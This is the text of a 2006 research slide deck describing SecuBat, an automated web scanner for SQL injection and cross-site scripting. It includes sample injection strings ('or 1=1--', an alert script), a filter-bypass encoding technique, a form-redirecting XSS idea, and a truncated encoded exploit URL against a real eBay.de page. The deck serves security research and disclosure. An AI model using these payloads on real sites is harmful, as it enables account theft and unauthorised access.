SecuBat Presentation - WWW2006

hurtpotatocreekΑσφάλεια

5 Νοε 2013 (πριν από 3 χρόνια και 10 μήνες)

103 εμφανίσεις

SecuBat:

An Automated Web Vulnerability
Detection Framework

Stefan Kals, Engin Kirda

Christopher Kruegel and Nenad Jovanovic

Secure Systems Lab

Vienna University of Technology

Austria



2006/05/25

SecuBat: An Automated Web Vulnerability
Detection Framework, © 2006 Stefan Kals

2

Outline


Motivation


Problem Definition


Typical Vulnerabilities


Automated Attack & Analysis Concepts


SecuBat Implementation


Related Tools


Prototype Results


Findings & Case Study

2006/05/25

SecuBat: An Automated Web Vulnerability
Detection Framework, © 2006 Stefan Kals

3

Motivation


Highly increasing number of web applications


Developers lack awareness of typical
vulnerabilities


The
„Why me?“

belief


Manual vulnerability checking causes much
work


Automated tool would solve the problems and
raise the security level


2006/05/25

SecuBat: An Automated Web Vulnerability
Detection Framework, © 2006 Stefan Kals

4

Problem Definition


Demonstrate how easy an attacker can find soft
targets on the web if web vulnerabilities are not fixed


Implement a crawling engine for collecting potential
targets


Find generic and automatically executable attack
techniques for the chosen approaches (SQL
Injection, Cross
-
Site Scripting)


Find suitable analysis techniques


Assemble these parts together into a pluggable
vulnerability analysis and detection framework

2006/05/25

SecuBat: An Automated Web Vulnerability
Detection Framework, © 2006 Stefan Kals

5

Typical Vulnerabilities 1/2


SQL Injection


Problem: No input validation before using
values to query database


Dynamically built SQL query:

q = “select * from user where mail=‘“ + mail + “‘ and pw=‘“ + pw + “‘“


Enter values using SQL syntax:

mail:

‘ or 1=1
--


password:

‘ or 1=1
--


Query has changed its semantics:

q = “select * from user where mail=‘
‘ or 1=1
--
‘ and pw=‘
‘ or 1=1
--
‘“


Resulting query:

q = “select * from user“

2006/05/25

SecuBat: An Automated Web Vulnerability
Detection Framework, © 2006 Stefan Kals

6

Typical Vulnerabilities 2/2
-

Cross
-
Site Scripting


Injecting HTML/Javascript by attacker


displayed & executed in victim’s browser


Reflected vs. Stored XSS


Stealing of user data (Cookies,

Credentials…)


Example: Redirecting login form to hacker’s
web server


Create exploit URLs & use for authentic
Phishing e
-
mails

2006/05/25

SecuBat: An Automated Web Vulnerability
Detection Framework, © 2006 Stefan Kals

7

Attack & Analysis Concepts
1/4
-

General


Open framework for easily implementing &
adding new attacks


Attack & Analysis modules (Black Box)


Runtime configurable Plugins


Use common Crawling and Attacking APIs


Store analysis results into database

2006/05/25

SecuBat: An Automated Web Vulnerability
Detection Framework, © 2006 Stefan Kals

8

Attack & Analysis Concepts
2/4
-

SQL Injection

1.
Attack module prepares
new attack & sends it to
server (e.g. single
quote)


2.
Server sends back a
response page


3.
Analysis module parses
response for keywords,
builds summary
confidence factor

Web Server
Attacker PC
1
2
MySQL
40
Server Error
75
Java
.
lang
60
Exception occurred
85
...
3
Keyword List
q = “select * from user where mail=‘

‘ “

2006/05/25

SecuBat: An Automated Web Vulnerability
Detection Framework, © 2006 Stefan Kals

9

Attack & Analysis Concepts
3/4
-

XSS Attack

1.
Attack module prepares new
attack & sends it to server
(e.g. Javascript to show a
message box)


2.
Server sends back a
response page


3.
Analysis module parses
response checking for the
occurrence of the injected
string (and the executability)


Web Server
Attacker PC
1
2
3
Search for
injected HTML

You searched for
:
<
b
>
<
script
>
alert
(
’XSS’
)
;
<
/
script
>
<
/
b
>
:
...
2006/05/25

SecuBat: An Automated Web Vulnerability
Detection Framework, © 2006 Stefan Kals

10

Attack & Analysis Concepts
4/4


Enhanced Attacks


Enhanced XSS attack


Uses
decimal HTML encoding

to bypass input filters


Replaces characters, e.g.:


=>
&#39;


Form
-
Redirecting XSS scenario


Checks for potential assets (stealable credentials)


Uses an encoded injection string redirecting the
found login form to the “attacker‘s server”


Simulates a real XSS attack, does not only check
input validation

2006/05/25

SecuBat: An Automated Web Vulnerability
Detection Framework, © 2006 Stefan Kals

11

SecuBat Implementation 1/2

2006/05/25

SecuBat: An Automated Web Vulnerability
Detection Framework, © 2006 Stefan Kals

12

SecuBat Implementation 2/2


Implementation Details


C#


Data Store:

MS SQL Database


Requirements


MS Windows 2000, XP,

2003


MS .NET Framework 2.0


MS SQL Server 2000/2005 or MSDE/SQL
Express 2005

2006/05/25

SecuBat: An Automated Web Vulnerability
Detection Framework, © 2006 Stefan Kals

13

Related Tools


Acunetix Web Vulnerability Scanner (commercial)


+ Web server technology detection


+ Application level attacks: Simple SQL injection, XSS


-

Closed source, no papers, no details to the public


Nessus, Nikto


-

Rely on repositories of known vulnerabilities


NMap, Xprobe...


-

Port scanners only


-

Network/OS level, no application level attacks


2006/05/25

SecuBat: An Automated Web Vulnerability
Detection Framework, © 2006 Stefan Kals

14

Prototype Results


Evaluation Run Results
(Google search for
„login“):


25.064 crawled pages


21.627 web forms


4 attack types


SQL Injection: 6,63%


Simple XSS: 4,30%


Enhanced XSS: 5,60%


Form
-
Red. XSS: 5,52%


2006/05/25

SecuBat: An Automated Web Vulnerability
Detection Framework, © 2006 Stefan Kals

15

Findings


Critical XSS Vulnerabilities (assets)


eBay (Auction access)


Austrian Finance Ministry (E
-
Government access)


Geizhals (Price management)


Crit.org (Security associated content)


Apple (Developer access)




2006/05/25

SecuBat: An Automated Web Vulnerability
Detection Framework, © 2006 Stefan Kals

16

A Case Study


eBay.de Press

http://presse.ebay.de/news.exe?typ=SU&search=%68%74
%74%70%3A%2F%2F%70%72%65%73%73%65%2E%65
%62%61%79%2E%64%65%2F%26%71%75%6F%74%3B
%3E...


2006/05/25

SecuBat: An Automated Web Vulnerability
Detection Framework, © 2006 Stefan Kals

17

Notifications


Query recipients
using
WhoIs

service


591 Mails sent


306 “recipient
unknown”


48 detail inquiries
after 1 week

2006/05/25

SecuBat: An Automated Web Vulnerability
Detection Framework, © 2006 Stefan Kals

18

Conclusion


Increasing use of web technology needs increasing
security effort


Rather simple attacks (SQL Injection, XSS Attack)
but many vulnerable web sites


An automated detection approach can increase your
site’s security


Implementation of an extensible (pluggable) analysis
framework (“SecuBat”)


First results of a prototype version show proof of
concept


2006/05/25

SecuBat: An Automated Web Vulnerability
Detection Framework, © 2006 Stefan Kals

19

The End

http://www.secubat.org